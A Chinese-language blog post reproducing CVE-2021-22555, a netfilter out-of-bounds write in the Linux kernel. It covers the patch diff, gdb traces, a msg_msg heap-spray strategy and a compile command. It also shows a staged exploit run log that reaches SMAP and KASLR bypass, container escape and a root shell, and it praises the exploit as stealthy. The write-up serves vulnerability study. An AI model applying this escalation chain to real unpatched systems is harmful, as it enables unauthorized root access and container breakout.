CVE-2021-22555到2021年修复时,已经存在了15年,是netfilter
模块一个越界写(OOB - out-of-bounds write)
。问题出现在x64内核上加载x86格式的xt table
消息时,padding的差异引起了越界写。问题在v2.6.19-rc1(9fa492cdc160cd27ce1046cb36f47d3b2b1efa21)
引入,在 2021.4 commit b29c457a6511435960115c0f548c4360d5f4801d
修复。
漏洞原理
diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c
index 6bd31a7a27fc..92e9d4ebc5e8 100644
--- a/net/netfilter/x_tables.c
+++ b/net/netfilter/x_tables.c
@@ -733,7 +733,7 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
{
const struct xt_match *match = m->u.kernel.match;
struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
- int pad, off = xt_compat_match_offset(match);
+ int off = xt_compat_match_offset(match);
u_int16_t msize = cm->u.user.match_size;
char name[sizeof(m->u.user.name)];
@@ -743,9 +743,6 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
match->compat_from_user(m->data, cm->data);
else
memcpy(m->data, cm->data, msize - sizeof(*cm));
- pad = XT_ALIGN(match->matchsize) - match->matchsize;
- if (pad > 0)
- memset(m->data + match->matchsize, 0, pad);
msize += off;
m->u.user.match_size = msize;
@@ -1116,7 +1113,7 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
{
const struct xt_target *target = t->u.kernel.target;
struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
- int pad, off = xt_compat_target_offset(target);
+ int off = xt_compat_target_offset(target);
u_int16_t tsize = ct->u.user.target_size;
char name[sizeof(t->u.user.name)];
@@ -1126,9 +1123,6 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
target->compat_from_user(t->data, ct->data);
else
memcpy(t->data, ct->data, tsize - sizeof(*ct));
- pad = XT_ALIGN(target->targetsize) - target->targetsize;
- if (pad > 0)
- memset(t->data + target->targetsize, 0, pad);
tsize += off;
vul: __sys_setsockopt(fd, level, optname, optval, optlen); nf_setsockopt do_ipt_set_ctl
OOB触发后后面页会有两个字节被设置成0:
(gdb) list
1126 memcpy(t->data, ct->data, tsize - sizeof(*ct));
1127 pad = XT_ALIGN(target->targetsize) - target->targetsize;
1128 if (pad > 0)
1129 memset(t->data + target->targetsize, 0, pad);
1130
1131 tsize += off;
1132 t->u.user.target_size = tsize;
1133 strlcpy(name, target->name, sizeof(name));
1134 module_put(target->me);
1135 strncpy(t->u.user.name, name, sizeof(t->u.user.name));
(gdb) p t
$104 = (struct xt_entry_target *) 0xffff888108c9afda
(gdb) p t->data
$105 = 0xffff888108c9affa ""
(gdb) x/a t->data
0xffff888108c9affa: 0x0 <fixed_percpu_data>
(gdb) p *t
$106 = {u = {user = {target_size = 32, name = "NFQUEU\240\2264\203\377\377\377\377", '\000' <repeats 14 times>, revision = 1 '\001'}, kernel = {target_size = 32,
target = 0xffffffff833496a0 <nfqueue_tg_reg+128>}, target_size = 32}, data = 0xffff888108c9affa ""}
(gdb) p/x t
$107 = 0xffff888108c9afda
(gdb) p target->targetsize
$108 = 4
(gdb) p/x 0xffff888108c9affa + 4
$109 = 0xffff888108c9affe
(gdb) x/20a 0xffff888108c9affe + 2
0xffff888108c9b000: 0xffff888108f82000 0xffff8881023f64c0
0xffff888108c9b010: 0x41 0xfd0
(gdb)x/20a 0xffff888108c9affe + 2
0xffff888108c9b000: 0xffff888108f80000 0xffff8881023f64c0
0xffff888108c9b010: 0x41 0xfd0
stack:
(gdb) bt
#0 xt_compat_target_from_user (t=0xffff888108c9afda, dstptr=dstptr@entry=0xffffc90000ae3ac8, size=size@entry=0xffffc90000ae3ac4) at net/netfilter/x_tables.c:1131
#1 0xffffffff81f77bbb in compat_copy_entry_from_user (base=<optimized out>, newinfo=<error reading variable: Cannot access memory at address 0x0>, size=0xffffc90000ae3ac4,
dstptr=0xffffc90000ae3ac8, e=0xffff888108c99040) at net/ipv4/netfilter/ip_tables.c:1376
#2 translate_compat_table (net=net@entry=0xffff8881053f33c0, pinfo=pinfo@entry=0xffffc90000ae3b80, pentry0=pentry0@entry=0xffffc90000ae3b88, compatr=compatr@entry=0xffffc90000ae3b94)
at net/ipv4/netfilter/ip_tables.c:1440
#3 0xffffffff81f78974 in compat_do_replace (net=net@entry=0xffff8881053f33c0, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1517
#4 0xffffffff81f78d4d in do_ipt_set_ctl (sk=<optimized out>, cmd=64, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1624
#5 0xffffffff81e1c64a in nf_setsockopt (sk=sk@entry=0xffff888105c31a40, pf=pf@entry=2 '\002', val=val@entry=64, opt=..., len=len@entry=4114) at net/netfilter/nf_sockopt.c:101
#6 0xffffffff81efd387 in ip_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=4114) at net/ipv4/ip_sockglue.c:1435
#7 0xffffffff81f0a564 in tcp_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=<optimized out>) at net/ipv4/tcp.c:3598
#8 0xffffffff81d17a6a in sock_common_setsockopt (sock=<optimized out>, level=<optimized out>, optname=<optimized out>, optval=..., optlen=<optimized out>) at net/core/sock.c:3249
#9 0xffffffff81d15e64 in __sys_setsockopt (fd=<optimized out>, level=<optimized out>, optname=<optimized out>, user_optval=0xffb44c0a "", optlen=<optimized out>) at net/socket.c:2115
#10 0xffffffff81d98631 in __do_compat_sys_socketcall (args=0xffb44ba8, call=14) at net/compat.c:492
#11 __se_compat_sys_socketcall (args=<optimized out>, call=14) at net/compat.c:424
#12 __ia32_compat_sys_socketcall (regs=<optimized out>) at net/compat.c:424
#13 0xffffffff821710e2 in do_syscall_32_irqs_on (nr=<optimized out>, regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:77
#14 __do_fast_syscall_32 (regs=regs@entry=0xffffc90000ae3f58) at arch/x86/entry/common.c:139
#15 0xffffffff821711f4 in do_fast_syscall_32 (regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:164
#16 0xffffffff8217124f in do_SYSENTER_32 (regs=<optimized out>) at arch/x86/entry/common.c:207
#17 0xffffffff8220164a in entry_SYSENTER_compat () at arch/x86/entry/entry_64_compat.S:139
#18 0x0000000000000000 in ?? ()
利用主要借助message queue:
MSGOP(2) System Calls Manual MSGOP(2)
NAME
msgrcv, msgsnd - System V message queue operations
LIBRARY
Standard C library (libc, -lc)
SYNOPSIS
#include <sys/msg.h>
int msgsnd(int msqid, const void msgp[.msgsz], size_t msgsz,
int msgflg);
ssize_t msgrcv(int msqid, void msgp[.msgsz], size_t msgsz, long msgtyp,
int msgflg);
DESCRIPTION
The msgsnd() and msgrcv() system calls are used to send messages to, and receive messages from, a System V message queue. The calling process must have write permission on
the message queue in order to send a message, and read permission to receive a message.
The msgp argument is a pointer to a caller-defined structure of the following general form:
struct msgbuf {
long mtype; /* message type, must be > 0 */
char mtext[1]; /* message data */
};
The mtext field is an array (or other structure) whose size is specified by msgsz, a nonnegative integer value. Messages of zero length (i.e., no mtext field) are permitted.
The mtype field must have a strictly positive integer value. This value can be used by the receiving process for message selection (see the description of msgrcv() below).
message queue 在内核中的主要结构是 struct msg_msg
:
/* offset | size */ type = struct msg_msg {
/* 0 | 16 */ struct list_head {
/* 0 | 8 */ struct list_head *next;
/* 8 | 8 */ struct list_head *prev;
/* total size (bytes): 16 */
} m_list;
/* 16 | 8 */ long m_type;
/* 24 | 8 */ size_t m_ts;
/* 32 | 8 */ struct msg_msgseg *next;
/* 40 | 8 */ void *security;
/* total size (bytes): 48 */
}
同一个queue的不同类型m_type
的message组成一个双向链表,由m_list
串起来。从上面内存分布可以看出,message的第一个元素是next
指针。
主要的利用思路:
- 构造
kernel config
make defconfig
make kvm_guest.config
修改CONFIG_USER_NS=y
KROP中使用了rbp恢复原始的调用栈,需要 CONFIG_FRAME_POINTER=y
msgsnd() -> alloc_msg 最大分配4K,数据第一片最大 4K - 0x30,后续都是最大4K - 8;
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))
编译: 安装 sudo apt install gcc-multilib
-> gcc -m32 -static -o poc exploit.c
done:
[+] STAGE 0: Initialization
[ 100.821096] IPVS: ftp: loaded support on port[0] = 21
[*] Initializing sockets and message queues...
[*] Initialize done sockets and message queues: 3
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...s: 3
[*] Searching for corrupted primary message...
[+] fake_idx: ffa
[+] real_idx: fda
[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] primary message kheap_addr: ffff888110091000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] Got secondary message (current UAF buf) kheap_addr: ffff888109000000
[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffff829d66c0
[+] kbase_addr: ffffffff81000000
[*] Leaking and freeing pipe_buffer object...
[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.
[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@wintermute:/#
总结
从2.6开始已经存在了很多年。本次复现采用的技术中,利用了RBP恢复利用前的调用栈。
整个利用过程相当于在正常执行流中悄悄执行了几个函数,然后又恢复了正常的流程。
这几个额外调用的函数,完成了权限提升,容器逃逸。
利用过程没有任何新的进程产生,没有任何新的文件产生,也没有文件修改,也没有新连接。
仅仅是切换了权限和进程空间!
利用完美,非常隐蔽。
文档信息
- 本文作者:seamaner
- 本文链接:https://seamaner.github.io/2025/04/26/CVE-2021-22555/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)